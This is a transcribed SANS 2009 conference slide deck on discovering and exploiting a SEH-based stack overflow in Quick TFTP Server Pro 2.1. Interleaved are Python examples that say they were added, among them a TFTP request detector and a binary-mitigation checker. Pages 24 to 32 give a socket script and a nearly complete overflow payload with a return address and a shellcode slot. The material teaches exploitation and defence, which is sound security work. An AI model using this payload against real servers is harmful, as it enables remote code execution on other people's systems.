Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Page 1

Advanced Penetration Testing - 2009 SANS 1

Custom Penetration Testing

Compromising a Vulnerability through Discovery and Custom Exploitation

Stephen Sims

Page 2

• Penetration Testing
• Precompiled Tools
• Targeting
• TFTP
  – Testing a TFTP Server for Bugs
  – Discovering the Bug
  – Exploiting the TFTP Server
• Advanced Concepts

Page 3

What is Penetration Testing?

• Process of testing a target environment for weaknesses
  – More thorough than vulnerability scanning alone
  – Validates findings by exploiting flaws
  – Allows you to think like an attacker
  – Various levels of interaction/depth

Page 4

Types of Penetration Testing

• Black-Box Penetration Testing
  – No access to source code
  – No access provided to OS, architecture, etc.
  – More like an outsider attack scenario
  – More time consuming
• Crystal-Box Penetration Testing
  – Tester given source code, system & network architecture and/or privileged system access
  – More thorough than black-box testing
  – Cost effective

Page 5

Precompiled Tools

• Pros
  – Can quickly be used
  – Customer support
  – Broad user community
  – Often allow custom scripts or modules
• Cons
  – Limited in scope
  – Only discover and test known vulnerabilities
  – Skilled attackers are not relying solely on them
  – Precompiled tools offer a sense of complacency
  – Do not perform code coverage or do deep fuzzing

Page 6

• General Steps
  1. Determine Target Application and Operating System
  2. Obtain a Copy of the Application
  3. Analyze RFC and Communications Protocols
  4. Discover and Record a Crash Condition
  5. Analyze Crash Condition for Exploitation


Page 7

1) Determine Target Application and Operating System

• What application/service are you analyzing?
  – What OSs is it available for?
    • Which one(s) are you interested in?
  – What services does the application start up?
    • There may be several
    • Scanning may help
    • Analyze documentation and code if possible
  – Are the services proprietary or standards-based?
    • Proprietary services often offer a lot of new opportunities

Page 8

2) Obtain a Copy of the Application

• Create a lab environment and install the application
  – Use the OS you are targeting
  – Utilize Virtual Machines
    • Create snapshots prior to installation
    • Install monitoring tools
  – Attempt to obtain the source code
    • Code analysis is often more complex than behavioral analysis, but valuable

Page 9

3) Analyze RFC and Communications Protocols

• Is documentation available?
  – Programmers should follow RFCs
• Search the RFC for potential options and fields that may contain opportunities to cause a fault
• Understand each aspect of the protocols used by the application and the behavior associated with each
  – Is architectural documentation available?

Page 10

4) Discover and Record a Crash Condition

• Are you properly monitoring?
  – Sniffers to record packets sent to the application
    • Wireshark/Tshark, tcpdump, etc.
    • Packets can be recorded and replayed
  – Debuggers to record application behavior while receiving/handling data
    • OllyDbg, Immunity Debugger, WinDbg
  – OS monitoring tools to monitor health
    • ProcMon, RegMon, FileMon, RegShot, etc.
  – The condition must be repeatable

Page 11

5) Analyze Crash Condition for Exploitation Opportunities

• What is happening during the crash?
  – Analyze the status of each register
    • Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A's
  – Is the Return Pointer or SEH chain being overwritten?
    • Analyze the stack segment and monitor ESP/EBP
  – Are heap pointers being overwritten?
    • Analyze dynamic memory allocations and behavior
  – There's way more to analyze, but this is a start!
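The register check on this slide, as an added example that is not part of the talk: a small Python triage helper that takes a register dump (the sample values below are constructed, modelled on what a debugger such as OllyDbg shows after a fault) together with the bytes that were sent, reports which registers now hold input bytes, and makes the coarse first classification a tester or incident responder would make. The function names are this example's own.

```python
import struct

# Constructed sample: a register dump of the kind a Windows debugger shows once
# the process faults. The values are made up for this example, not from the talk.
SAMPLE_REGISTERS = {
    "EAX": 0x00000000,
    "ECX": 0x41414141,
    "EDX": 0x7C90E4F4,
    "EBX": 0x00000000,
    "ESP": 0x0012F9A0,
    "EBP": 0x41414141,
    "ESI": 0x00E9D8F0,
    "EDI": 0x00000000,
    "EIP": 0x41414141,
}


def tainted_registers(registers, payload):
    """Return {register: offset} for every register whose 32-bit value, written
    little-endian as it sits in memory, occurs verbatim in the bytes we sent.
    With a uniform run of A's the offset is simply the first "AAAA" in the
    payload, which is why the walk-through later narrows the position down by
    varying the count rather than reading it off a single crash."""
    hits = {}
    for name, value in registers.items():
        raw = struct.pack("<I", value & 0xFFFFFFFF)
        offset = payload.find(raw)
        if offset != -1:
            hits[name] = offset
    return hits


def classify_crash(registers, payload):
    """Coarse triage in the spirit of the slide: an input-controlled instruction
    pointer means the fault is more than a denial of service; a controlled frame
    or stack pointer says the return pointer / SEH chain deserves a look; input
    in other registers hints at a pointer overwrite; otherwise dig deeper."""
    hits = tainted_registers(registers, payload)
    if "EIP" in hits:
        return "EIP controlled by input: likely code execution, not just DoS"
    if "EBP" in hits or "ESP" in hits:
        return "stack frame overwritten: inspect return pointer and SEH chain"
    if hits:
        return f"input reaches registers {sorted(hits)}: check for pointer overwrite"
    return "no input bytes in registers: needs deeper analysis"


if __name__ == "__main__":
    # Constructed: a read-request opcode followed by a long run of A's, the shape
    # of request the later slides use against the lab server.
    sent = b"\x00\x01" + b"A" * 1060
    print(tainted_registers(SAMPLE_REGISTERS, sent))
    print(classify_crash(SAMPLE_REGISTERS, sent))
```

The same two functions work unchanged on a dump taken from a fuzzing harness or a crash report, which is where a defender most often meets 0x41414141-style values.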

Page 12

Targeting (2)

• Our goal is to discover and exploit a Windows Program vulnerability!
• The techniques we'll cover are applicable to any target or service
• We're targeting a TFTP service
  – Must understand how the protocol works
  – Developers should follow RFCs
    • We can leverage the RFC as well
  – Could use fuzzing to automate bug discovery

Page 13

Our TFTP Target

• Quick TFTP Server Pro Version 2.1
  – Vulnerable to a stack-based buffer overflow
    • Can exploit by overwriting the Structured Exception Handling (SEH) chain
    • Allows for DoS or code execution as System
  – TFTP Server published by TallSoft
  – Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security

Page 14

• Trivial File Transfer Protocol (TFTP)
  – Simple protocol for transferring files over a network
  – Clear-text protocol using UDP port 69
  – Used for transferring files by network devices, VoIP phones and other client-server programs

Page 15

TFTP Behavior

• Connection request is combined with either a read or write request
• Blocks of data are sent in a fixed 512 byte size
  – Each block must be acknowledged for error control
  – A block less than 512 bytes indicates the end of the stream

Page 16

TFTP Behavior (2)

• The first two bytes of a TFTP header indicate the request type and format
  – \x00\x01 indicates a read request
  – \x00\x02 indicates a write request
  – \x00\x03 indicates the data block
  – \x00\x04 is an acknowledgement
  – \x00\x05 indicates an error
  – \x00\x06 is an option acknowledgement

Page 17

TFTP Behavior (3)

• Read and Write request format:
  – \x00\x01 for read | \x00\x02 for write
  – File Name
  – Null byte - \x00
  – Mode – Binary, ASCII or Mail
  – Null byte - \x00
• Example

  Request   Type       File Name   Null   Mode    Null
  Read      \x00\x01   file1.txt   0      Octet   0
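An added example, not from the slides, that encodes the formats just described in Python: the read/write request layout from the table, 512-byte DATA blocks with the short final block that ends a transfer (page 15), and the ACK each block requires. The opcode constants and helper function names are this example's own; the file content used in the demonstration is constructed.

```python
import struct

# TFTP opcodes as listed on the previous slide (RFC 1350; 6 is the OACK of RFC 2347)
RRQ, WRQ, DATA, ACK, ERROR, OACK = 1, 2, 3, 4, 5, 6
BLOCK_SIZE = 512


def build_request(opcode, filename, mode="octet"):
    """Encode a read or write request: 2-byte opcode, file name, NUL, mode, NUL."""
    if opcode not in (RRQ, WRQ):
        raise ValueError("request opcode must be RRQ or WRQ")
    if "\x00" in filename or "\x00" in mode:
        raise ValueError("fields are NUL-terminated and cannot contain NUL")
    return (struct.pack("!H", opcode)
            + filename.encode("ascii") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def build_data(block_number, payload):
    """DATA packet: opcode 3, 16-bit block number, up to 512 bytes of payload."""
    return struct.pack("!HH", DATA, block_number) + payload


def build_ack(block_number):
    """ACK packet: opcode 4 and the block number being acknowledged."""
    return struct.pack("!HH", ACK, block_number)


def split_into_blocks(content):
    """Return [(block_number, DATA packet), ...] for a file. Blocks are 512 bytes;
    a shorter final block (possibly empty, when the size is a multiple of 512)
    is what tells the receiver the stream has ended."""
    blocks = []
    number, offset = 1, 0
    while True:
        chunk = content[offset:offset + BLOCK_SIZE]
        blocks.append((number, build_data(number, chunk)))
        if len(chunk) < BLOCK_SIZE:
            return blocks
        number += 1
        offset += BLOCK_SIZE


def is_last_block(packet):
    """A DATA block carrying fewer than 512 bytes ends the transfer."""
    opcode, _ = struct.unpack("!HH", packet[:4])
    return opcode == DATA and len(packet) - 4 < BLOCK_SIZE


def receive_file(packets):
    """Reassemble a file from DATA packets, producing the ACK for each block and
    stopping at the short block. Anything out of sequence is rejected."""
    expected = 1
    received = bytearray()
    acks = []
    for packet in packets:
        opcode, number = struct.unpack("!HH", packet[:4])
        if opcode != DATA or number != expected:
            raise ValueError(f"unexpected packet: opcode={opcode} block={number}")
        received += packet[4:]
        acks.append(build_ack(number))
        if is_last_block(packet):
            return bytes(received), acks
        expected += 1
    raise ValueError("stream ended without a short final block")


if __name__ == "__main__":
    print(build_request(RRQ, "file1.txt"))          # the table's example request
    sample = b"X" * 1100                             # constructed file content
    blocks = split_into_blocks(sample)
    content, acks = receive_file([pkt for _, pkt in blocks])
    print(len(blocks), "blocks,", len(acks), "acks, intact:", content == sample)
```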

Page 18

Hacking Quick TFTP Server

• Quick TFTP Server Version 2.1
  – Install tftpserver_setup.exe onto a Windows XP Virtual Machine
  – Use the TFTP information just covered to help with the investigation
  – Attempt to crash the TFTP server while running in a debugger
  – Create a custom script to start the testing
  – Validate findings
  – Attempt code execution

Page 19

Tools We Need

• Programming/Scripting Language
  – Python, Perl, Ruby, C
• Debugger and Disassembler
  – OllyDbg, Immunity Debugger, IDA Pro
• Shellcode
  – Metasploit, Milw0rm, Custom
• An open mind!
  – Knowledge of OS controls, Opcodes, Tricks…

Page 20

• Object-oriented, High-level Programming Language
• Very Intuitive
• Very Modular
• No Manual Compilation
• Plays well with other languages – C, C++, Jython, IronPython (.NET)
• Good Debugging

Page 21

Tool: OllyDbg

• Software Debugger for Windows
  – Author: Oleh Yuschuk
• Shareware!
• Binary Code Analysis
• Register Contents, Procedures, API Calls, Patching, memory searching and more!

Page 22

Hacking TFTP Hint #1

• Consider the format of TFTP requests for your script
  – We covered the order a few slides ago
  – Read & Write requests are often the easiest to attack as they have variable fields
    • They start with \x00\x01 & \x00\x02
  – The header format must be correct to trigger a valid response
  – Command line scripting is not always the best option
    • You may want to write a script

Page 23

Hacking TFTP Hint #2

• Where could a buffer overflow condition exist?
  – Try the request type field, file name and/or the mode
  – Don't forget the nulls to terminate!
  – Make sure you're watching the right thread in OllyDbg
    • Processes have multiple threads on Windows

Page 24

Hacking TFTP Hint #3

• The easiest way is to use Python or Perl to open a socket and send your script

    import socket

    target = 'IP ADDRESS'          # Enter the right IP here
    port = 69                      # Port for TFTP
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # TFTP runs over UDP
    cmd = b"A" * 10                # Enter the number of A's to send
    data = b"\x00\x01" + cmd       # Modify this line to format your packet (read-request opcode first)
    s.sendto(data, (target, port))

The slide's original used plain string literals (Python 2); the b"" prefixes keep the same bytes on the wire under Python 3.

Page 25

Quick TFTP Walk-Through

• Start Quick TFTP Server with Olly

• Ignore entry point messages

• Press F9 once loaded

• Click “OK” on the demo pop-up

Page 26

Quick TFTP Walk-Through (2)

• This may be possible via command line, but…
  – We need a script!
  – Don't forget the formatting of TFTP read and write requests:

  Request   Type       File Name   Null   Mode    Null
  Read      \x00\x01   file1.txt   0      Octet   0

  – The overflow is in the mode section!
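Seen from the defender's side, the same request format says what a detection rule for UDP port 69 should check. The following Python is an added example, not from the talk: it parses read/write requests out of constructed UDP payloads and flags a mode field that is not one of the RFC 1350 modes (netascii, octet, mail) or is far longer than any legitimate client would send. The length limits are this example's own assumptions; the RFC sets none.

```python
import struct

# RFC 1350 transfer modes; anything else in the mode field is at best a client
# bug and at worst an attempt to overflow the field, as in the walk-through.
KNOWN_MODES = {b"netascii", b"octet", b"mail"}

# Assumed limits for this example (the RFC imposes none): legitimate clients send
# short file names and one of the three mode words above.
MAX_FILENAME = 255
MAX_MODE = 8

# Constructed sample datagrams as they would arrive at port 69.
SAMPLE_DATAGRAMS = [
    b"\x00\x01file1.txt\x00octet\x00",              # normal read request
    b"\x00\x02backup.bin\x00NETASCII\x00",          # normal write request, odd case
    b"\x00\x01blah\x00" + b"A" * 1060 + b"\x00",    # oversized mode field
    b"\x00\x01" + b"A" * 1000,                      # no NUL terminators at all
]


def parse_request(datagram):
    """Return (opcode, filename, mode) for an RRQ/WRQ, raising on malformed input."""
    if len(datagram) < 4:
        raise ValueError("too short")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (1, 2):
        raise ValueError("not a read/write request")
    parts = datagram[2:].split(b"\x00")
    if len(parts) < 3:          # file name, mode, and the remainder after the final NUL
        raise ValueError("missing NUL terminators")
    return opcode, parts[0], parts[1]


def inspect_request(datagram):
    """Return the list of findings for one UDP payload; empty means it looks benign."""
    try:
        opcode, name, mode = parse_request(datagram)
    except ValueError as err:
        return [f"malformed: {err}"]
    findings = []
    if len(name) > MAX_FILENAME:
        findings.append(f"file name field is {len(name)} bytes")
    if mode.lower() not in KNOWN_MODES:
        findings.append(f"non-standard mode field of {len(mode)} bytes")
    if len(mode) > MAX_MODE:
        findings.append("mode field length consistent with a buffer overflow attempt")
    return findings


def scan(datagrams):
    """Map datagram index to findings for every datagram that produced at least one."""
    report = {}
    for index, datagram in enumerate(datagrams):
        findings = inspect_request(datagram)
        if findings:
            report[index] = findings
    return report


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_DATAGRAMS).items():
        print(index, findings)
```

The same checks translate directly into a signature for a network IDS (opcode 1 or 2, then a mode field longer than a few bytes or not matching a known mode), and the malformed branch catches requests that never terminate their fields.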

Page 27

Quick TFTP Walk-Through (3)

• Write a Python script that connects to the TFTP server with 1000 A's
• No crash in Olly…

Page 28

Quick TFTP Walk-Through (4)

1060 A’s

Olly has paused

EIP is 41414141


Page 29

Quick TFTP Walk-Through (5)

• What are we overwriting?
• Let's do some math to see where the overflow is occurring

We overwrote the SEH Chain!

Page 30

Quick TFTP Walk-Through (6)

• Subtracting 41 A's should take us to the SEH handler
• Let's give it a try by setting:

    cmd = b"A" * 1023 + b"\xde\xc0\xad\xde"

We control EIP at 1023 bytes!

Page 31

Quick TFTP Walk-Through (7)

• We now need to find a valid pop/pop/ret instruction
  – Use the findjmp tool and experiment
  – 0x77ec9cac is one I chose from kernel32.dll for XP SP1
  – Remember that you must compensate for SafeSEH if hacking XP SP2/SP3
  – Also remember that not every pop/pop/ret address will work. You gotta dig…

Page 32

Quick TFTP Walk-Through (8)

• Finalizing our script…

    cmd = b"A" * 1019 + b"\xeb\x06\x90\x90" + b"\xac\x9c\xec\x77" + b"\x90" * 4 + sc
    data = b"\x00\x01" + b"blah" + b"\x00" + cmd + b"\x00"

Our jmp and pointer…

Our NOPs and shellcode… (sc holds the shellcode, which is not shown on the slide)

Page 33

Advanced Concepts

• Depending on the OS version, a number of controls have been added
  – SafeSEH
    • Protects SEH pointers against overwrites
  – ASLR
    • Randomizes locations of libraries and memory segments
  – DEP
    • Prevents code execution on the stack and heap
  – Security Cookies
    • Pushes unique values onto the stack and heap during allocations which are checked upon exit or free
• Every byte in memory is a potential full or partial opcode
  – As long as the segment is executable
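Whether a given Windows binary actually opts in to DEP and ASLR (and whether it uses SEH at all) is recorded in the DllCharacteristics field of the PE optional header, and the SafeSEH handler table lives in the Load Config data directory. The following Python is an added example, not part of the talk, that reads those bits straight from the headers; a defender can run it over a vendor binary before deployment. build_sample_pe32 constructs a headers-only PE32 fixture so the check runs offline, and the check only reports whether a Load Config directory exists rather than walking its SEHandlerTable.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040     # image may be relocated: required for ASLR
NX_COMPAT = 0x0100        # image declares itself DEP-compatible
NO_SEH = 0x0400           # image uses no structured exception handlers
LOAD_CONFIG_DIRECTORY = 10    # data directory index holding the Load Config (SafeSEH table)


def pe_mitigations(image):
    """Report the opt-in mitigation flags of a PE image from its headers alone."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ)")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image (missing PE signature)")
    coff = e_lfanew + 4
    (size_of_optional,) = struct.unpack_from("<H", image, coff + 16)
    if size_of_optional < 72:
        raise ValueError("optional header too small")
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", image, opt)
    # DllCharacteristics sits at +70 in both PE32 and PE32+ optional headers.
    (dll_characteristics,) = struct.unpack_from("<H", image, opt + 70)
    # The data directories start at +96 (PE32) or +112 (PE32+), preceded by their count.
    if magic == 0x10B:
        count_off, dirs = opt + 92, opt + 96
    elif magic == 0x20B:
        count_off, dirs = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic")
    (num_dirs,) = struct.unpack_from("<I", image, count_off)
    has_load_config = False
    if num_dirs > LOAD_CONFIG_DIRECTORY:
        rva, size = struct.unpack_from("<II", image, dirs + 8 * LOAD_CONFIG_DIRECTORY)
        has_load_config = rva != 0 and size != 0
    return {
        "aslr": bool(dll_characteristics & DYNAMIC_BASE),
        "dep": bool(dll_characteristics & NX_COMPAT),
        "no_seh": bool(dll_characteristics & NO_SEH),
        "load_config_present": has_load_config,
    }


def build_sample_pe32(dll_characteristics, load_config_rva=0, load_config_size=0):
    """Constructed fixture: a minimal PE32 header (no sections, no code) carrying
    the requested flags, so pe_mitigations can be exercised without a real binary."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)            # e_lfanew -> PE signature
    header += b"PE\x00\x00"
    # COFF header: i386, 0 sections, zero timestamp/symbols, 0xE0-byte optional
    # header, Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE
    header += struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 0xE0, 0x0102)
    optional = bytearray(0xE0)
    struct.pack_into("<H", optional, 0, 0x10B)            # PE32 magic
    struct.pack_into("<H", optional, 70, dll_characteristics)
    struct.pack_into("<I", optional, 92, 16)              # NumberOfRvaAndSizes
    struct.pack_into("<II", optional, 96 + 8 * LOAD_CONFIG_DIRECTORY,
                     load_config_rva, load_config_size)
    return bytes(header + optional)


if __name__ == "__main__":
    print("no opt-in:", pe_mitigations(build_sample_pe32(0)))
    print("hardened: ", pe_mitigations(build_sample_pe32(DYNAMIC_BASE | NX_COMPAT, 0x3000, 0x40)))
```

A binary compiled without these bits gets no ASLR and, under the default opt-in DEP policy of the XP era, no DEP either; on the SafeSEH side, an empty Load Config is an immediate tell that the handler table the loader would validate against does not exist.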

Page 34

More Information

• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf
• Preventing the Exploitation of SEH Overwrites by Skape "Matt Miller" http://www.uninformed.org/?v=5&a=2&t=pdf
• SEH Overwrites Simplified v1.01 by Aelphaeis Mangarae http://www.milw0rm.com/papers/187
• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
• Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
• Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf
• "Heap Feng Shui in JavaScript" by Alexander Sotirov http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
• Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32-shellcode.pdf

Page 35

• Questions?

SANS SEC709 "Developing Exploits for Penetration Testers and Security Researchers"
[email protected]
